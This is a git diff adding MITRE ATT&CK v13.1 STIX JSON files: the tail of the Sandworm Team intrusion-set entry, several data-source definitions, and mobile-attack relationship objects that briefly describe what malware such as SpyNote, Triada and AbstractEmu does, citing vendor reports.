"IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T19:30:41.131Z", + "name": "Application Vetting", + "description": "Application vetting report generated by an external cloud service.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Report" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "created": "2023-03-13T19:30:41.131Z", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0041", + "external_id": "DS0041" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T19:36:25.108Z", + "name": "User Interface", + "description": "Visual activity on the device that could alert the user to potentially malicious behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Device" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "created": "2023-03-13T19:36:25.108Z", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0042", + "external_id": "DS0042" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:40.409Z", + "name": "Sensor Health", + "description": "Information from host telemetry providing insights about system status, errors, or other notable functional activity", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0013", + "external_id": "DS0013" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + }, + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ], + "spec_version": "2.0" +} diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0008005f-ca51-47c3-8369-55ee5de1c65a.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0008005f-ca51-47c3-8369-55ee5de1c65a.json new file mode 100644 index 0000000000000000000000000000000000000000..102b9e7e2241459441a3ddd36b0f4d191ce685e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0008005f-ca51-47c3-8369-55ee5de1c65a.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ef2b05e8-aa8a-4a2f-8060-24f4a315a0de", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0008005f-ca51-47c3-8369-55ee5de1c65a", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:43:54.975Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) uses an Android broadcast receiver to automatically start when the device boots.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308.json new file mode 100644 index 0000000000000000000000000000000000000000..0a6415f051b812ac94a561551be080d0feceac44 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c2877fc6-fa7f-4307-9927-61a8d17e430b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308", + "created": "2023-02-06T19:04:33.224Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:06:11.934Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can monitor notifications.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341.json new file mode 100644 index 0000000000000000000000000000000000000000..dd936d881cb44bc3066a19b11b1cdc253000cd35 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--7105a463-8b65-4754-b181-a255802ae64d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341", + "type": "relationship", + "created": "2019-07-16T14:33:12.085Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "modified": "2020-04-27T16:52:49.480Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) utilizes a backdoor in a Play Store app to install additional trojanized apps from the Command and Control server.(Citation: Google Triada June 2019)", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0100020b-97d4-4657-bc71-c6a1774055a6.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0100020b-97d4-4657-bc71-c6a1774055a6.json new file mode 100644 index 0000000000000000000000000000000000000000..e5f82b1a67e3d1f3f1603c99ee5b7d7de55ac969 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0100020b-97d4-4657-bc71-c6a1774055a6.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7aa75c95-3d29-4d6a-a84d-85333e380d9f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0100020b-97d4-4657-bc71-c6a1774055a6", + "created": "2022-04-20T17:36:25.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:39:23.114Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has exfiltrated data via both SMTP and HTTP.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--01965668-d033-4aca-a8e5-71a07070e266.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--01965668-d033-4aca-a8e5-71a07070e266.json new file mode 100644 index 0000000000000000000000000000000000000000..f87fdc75af0b69aa845866d9b7d6aa5d9faf5609 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--01965668-d033-4aca-a8e5-71a07070e266.json @@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--1f580ea0-a6a0-4b26-b50b-880824da90f8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--01965668-d033-4aca-a8e5-71a07070e266", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2.json new file mode 100644 index 0000000000000000000000000000000000000000..23d6aa9beded4dd83d91593a0dab3428a9a027d6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--61f19102-48d0-4081-8286-ae793f742605", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2", + "type": "relationship", + "created": "2020-09-15T15:18:12.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.398Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect device networking information, including phone number, IMEI, and IMSI.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80.json new file mode 100644 index 0000000000000000000000000000000000000000..cfa09234be662ea31cac69f010581a079db33bab --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--95147ff5-d828-4dfe-833e-3cf6f4262510", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80", + "type": "relationship", + "created": "2020-07-20T13:49:03.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2020-09-24T15:12:24.191Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) collects the device\u2019s Android ID and serial number.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3.json new file mode 100644 index 0000000000000000000000000000000000000000..ade3f8786aaec64e2f35d071a6b689040deeb05c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6e4e8111-6898-4a1d-aa27-6e74943453a6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3", + "created": "2023-02-06T18:50:12.251Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T14:40:57.100Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can check device system properties to potentially avoid running while under analysis.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--022e941f-30c3-45a9-9f6f-36e704b80060.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--022e941f-30c3-45a9-9f6f-36e704b80060.json new file mode 100644 index 0000000000000000000000000000000000000000..756e801ad8bd502c895c2aaa9bfed4add4bdbedf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--022e941f-30c3-45a9-9f6f-36e704b80060.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--cbc6dd99-b3ff-4114-a1b0-229ca95d65ef", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--022e941f-30c3-45a9-9f6f-36e704b80060", + "created": "2020-04-24T17:46:31.574Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:13.361Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) registers for the `SCREEN_ON` and `SMS_DELIVER` intents to perform actions when the device is unlocked and when the device receives an SMS message.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": 